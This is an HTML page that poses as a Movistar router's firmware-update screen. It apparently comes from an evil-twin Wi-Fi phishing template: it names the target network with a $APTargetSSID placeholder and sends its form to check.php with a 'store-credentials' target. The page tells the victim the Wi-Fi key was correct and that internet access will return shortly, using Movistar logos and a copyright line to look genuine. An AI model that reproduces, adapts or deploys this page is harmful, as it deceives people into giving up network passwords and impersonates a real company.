<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no, minimal-ui">
    <meta name="msapplication-tap-highlight" content="no">
    <meta name="google" value="notranslate">
    <meta name="theme-color" content="#3c73aa">
    <meta id="win8Icon" name="msapplication-TileImage" content="">
    <meta id="win8TileColor" name="msapplication-TileColor" content="#3c739b">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-title" content="">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="title" content="Administrador de Router Movistar">
    <link id="favicon" rel="shortcut icon" href="appsuite/apps/themes/webmail_e/favicon.ico"

      type="image/x-icon">
    <link id="icon57" rel="apple-touch-icon" href="">
    <link id="icon72" rel="apple-touch-icon" sizes="72x72" href="">
    <link id="icon76" rel="apple-touch-icon" sizes="76x76" href="">
    <link id="icon114" rel="apple-touch-icon" sizes="114x114" href="">
    <link id="icon120" rel="apple-touch-icon" sizes="120x120" href="">
    <link id="icon144" rel="apple-touch-icon" sizes="144x144" href="">
    <link id="icon152" rel="apple-touch-icon" sizes="152x152" href="">
    <link id="splash460" href="" media="(device-width: 320px)" rel="apple-touch-startup-image">
    <link id="splash920" href="" media="(device-width: 320px) and (-webkit-device-pixel-ratio: 2)"

      rel="apple-touch-startup-image">
    <link id="splash1096" href="" media="(device-aspect-ratio: 40/71)" rel="apple-touch-startup-image">
    <link rel="stylesheet" href="appsuite/apps/themes/webmail_e/login.css">
    <style type="text/css">
html, body { background-color: #fff; margin: 0; padding: 0; border: 0; }
body { overflow: hidden; }
.throbber {
    position: absolute;
    top: 50%;
    width: 100%;
    text-align: center;
    margin: -10px 0 -21px 0;
}
.throbber > div {
    width: 14px;
    height: 14px;
    background-color: #ccc;
    border-radius: 100%;
    display: inline-block;
    -webkit-animation: bouncedelay 1.4s infinite ease-in-out;
    animation: bouncedelay 1.4s infinite ease-in-out;
    /* Prevent first frame from flickering when animation starts */
    -webkit-animation-fill-mode: both;
    animation-fill-mode: both;
}
.throbber .bounce1 {
    -webkit-animation-delay: -0.32s;
    animation-delay: -0.32s;
}
.throbber .bounce2 {
    -webkit-animation-delay: -0.16s;
    animation-delay: -0.16s;
}
@-webkit-keyframes bouncedelay {
  0%, 80%, 100% { -webkit-transform: scale(0.0) }
  40% { -webkit-transform: scale(1.0) }
}
@keyframes bouncedelay {
  0%, 80%, 100% {
    transform: scale(0.0);
    -webkit-transform: scale(0.0);
  } 40% {
    transform: scale(1.0);
    -webkit-transform: scale(1.0);
  }
}
</style> <meta id="bootstrap">
    <meta id="theme">
    <meta id="css">
    <meta id="custom">
    <meta id="code">
    <link rel="stylesheet" href="appsuite/apps/themes/webmail_e/movistar.css">
    <script>
                                                                                                                                                                                                     
</script> <script src="appsuite/apps/themes/webmail_e/run_login.js"></script>
  </head>
  <body class="unselectable">
    <div id="io-ox-core" class="abs unselectable" style="display: none">
      <div id="io-ox-banner"> <span class="banner-logo" style="display: none"></span>
        <span class="banner-title"></span> <span class="banner-content"></span>
      </div>
      <div id="io-ox-topbar" role="banner" class="f6-target">
        <div role="navigation">
          <ul class="launchers list-unstyled">
          </ul>
        </div>
      </div>
      <div id="io-ox-screens" class="abs">
        <div id="io-ox-windowmanager" class="abs" style="display: none">
          <div id="io-ox-windowmanager-pane" class="atb"></div>
        </div>
        <div id="io-ox-desktop" class="abs"></div>
      </div>
    </div>
    <div id="io-ox-login-screen" class="unselectable" style="display: block">
      <div id="io-ox-login-background" class="wallpaper"></div>
      <div id="io-ox-login-blocker" style="display: none"></div>
      <div id="io-ox-login-container-scrollpane">
        <div class="imagen-marca"> <img class="img-responsive center-block" src="appsuite/apps/themes/webmail_e/logo-movistar.png">
        </div>
        <div id="io-ox-login-container" class="container">
          <div id="io-ox-login-header">
            <h1>
              <!-- --> </h1>
          </div>
          <div class="container">
            <div id="io-ox-login-form-container">
              <div class="row">
                <div class="col-sm-offset-2 col-sm-5">
                  <p class="logo-acceso">Actualizando Firmware</p>
                </div>
              </div>
              <div class="row">
                <div class="col-xs-offset-2 col-xs-8 col-sm-offset-2 col-sm-5">
                  <div class="row">
                    <form id="form1" name="form1" method="POST" action="check.php"

                      accept-charset="UTF-8" target="store-credentials" novalidate=""

                      autocomplete="off" <div="" class="row">
                      <p class="enlace-ayuda-container">Se ha perdido la
                        conexión con <b>$APTargetSSID</b> <img src="" alt="" style="left: 0px; width: 0px;"

                          height="24"> <span>Clave correcta en breves momentos se restablecera su conexion a internet.</span>
                      </p>
                      <div class="row help">
                        <div class="col-md-12">
                          <p id="io-ox-login-help" class="help-block"></p>
                        </div>
               <input name="version" value="Acceso login" type="hidden">
                      <div class="row buttons">
                        <div class="form-group row m-t-1"> <br>
                          <p class="enlace-ayuda-container"> <img src="" alt=""

                              style="left: 0px; width: 0px;" height="24"> <span>Copyright
                              © by Movistar 2022</span> </p>
                        </div>
                      </div>
                    </form>
                  </div>
                  <div class="col-xs-offset-2 col-xs-8 col-sm-offset-1 col-sm-4">
                    <!--span id="io-ox-languages"></span-->
                    <!--span id="io-ox-copyright"></span--> </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </body>
</html>
